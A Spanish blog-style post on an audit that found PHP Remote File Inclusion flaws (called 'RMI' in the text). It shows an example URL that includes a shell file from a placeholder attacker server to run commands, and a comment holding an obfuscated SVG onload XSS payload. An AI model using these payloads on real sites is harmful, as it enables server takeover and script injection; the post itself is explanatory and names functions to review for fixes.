VULNERABILIDAD FILE INCLUSION

Hace días hice una auditoría de caja negra a unos servidores de una conocida empresa que trabaja los 365 días del año en internet. He de decir que siempre me ofrecen datos de losservidores y demás, pero soy de los que me encantan las auditorías de caja negra y al cliente directamente le digo que no me ofrezca ningún dato. Tampoco le cobro el tiempo que paso, descubriendo la red objetivo (esto no sería ético), esto lo hago porque verdaderamente me gusta este tipo de trabajo.

Tras localizar las ips de la empresa y burlar algún que otro firewall, algo que no me llevo mucho tiempo, pude pasarle los escáneres a los servidores. Todos los escáneres me reportaban una gran cantidad de vulnerabilidades incluso ajustándolos mucho.


Esta empresa tenía varios servidores con varios servicios activos, y todos sus servidores tenían una gran cantidad de vulnerabilidades en sus servicios web.

Como la mayoría de sus aplicaciones web estaban basadas en php, tenían la famosa vulnerabilidad RMI (Remote File Inclusion), que permitiría a un atacante enlazar archivos situados en un servidor remoto. Esta vulnerabilidad es muy conocida pero a la vez muy común en muchos servidores web.

Como página vulnerable vamos a poner:

http://[web_victima]/index.php?page=moviles.html

Pues para obtener una Shell en el servidor afectado tendríamos que añadir esto:

http://[web_victima]/index.php?page=http://[ip_del_servidor _atacante]/shell.txt&&cmd=ls

El código malicioso tendría que estar contenido en el archivo shell.txt, simplemente tiene que tener una extensión que no se ejecute en el servidor atacante.


Con este simple ataque, se puede tomar el control de los servidores afectados por esta vulnerabilidad y a través de ellos a toda la red interna de la organización.

Hay que decir que este tipo de vulnerabilidad es muy común en los sitios programados con php pero que con unas sencilla pautas de seguridad podemos corregir, eso sí nos toca revisar el código, pues el código php mal programado es bastante inseguro. Hay que poner especial atención en el uso de las funciones Include(), Include_once(), require(), Require_once(), eval(), exec(), passthru(), system(), popen(), fopen(), readfile(), file(), readfile(), file()

Como podes ver en la foto esta es solo una de las muchas vulnerabilidades que tenía esta empresa pero esta era una de las más comunes y más críticas en sus servidores. Siempre hay que empezar a corregir o mitigar, por las vulnerabilidades que consideremos más críticas

Comentarios

\74svg o\156load\75alert\501\51\76